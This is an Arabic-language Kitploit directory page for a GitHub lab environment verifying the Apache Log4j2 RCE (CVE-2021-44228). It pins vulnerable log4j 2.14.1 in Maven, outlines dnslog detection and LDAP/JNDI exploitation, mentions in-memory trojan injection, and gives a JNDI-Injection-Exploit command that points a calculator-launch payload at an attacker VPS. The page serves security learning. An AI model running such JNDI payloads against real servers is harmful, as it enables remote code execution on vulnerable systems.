Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Apache-Log4j2-RCE — بيئة التحقق من ثغرة RCE في Apache Log4j2 (CVE-2021-44228) | Kitploit
أدوات/GitHubGitHub/1in9e/apache-log4j2-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

بيئة التحقق من ثغرة RCE في Apache Log4j2 (CVE-2021-44228)

عرض المستودع
21منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيئة التحقق من Apache Log4j2 RCE

منذ 2021.12.09

بعض المراجع

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

إعداد البيئة

استيراد الحزم المرتبطة ونطاق الإصدارات المعرضة للخطر باستخدام Maven

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

الفحص

استخدام dnslog للكشف عن الاستخدام

0

استخدام ldap مع jndi لاستغلال RCE

يتعلق بإصدار JDK، بعد JDK 11.0.1 و8u191 و7u201 و6u211، يجب ضبط trustURLCodebase يدويًا على true

لمزيد من التعلم التفصيلي حول هذا، راجع https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

طريقة الاستغلال، يمكن دمجها مع أدوات حقن jndi، مثل JNDI-Injection-Exploit وfastjson_rce_tool وJNDIExploit

يمكن أيضًا دمج الأدوات لتحقيق طرق عرض النتائج المتعددة المعلنة، وطرق حقن الأحصنة الطروادة في الذاكرة

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

Web

TODO

3

حول

https://github.com/apache/logging-log4j2/tags

تنزيل الأداة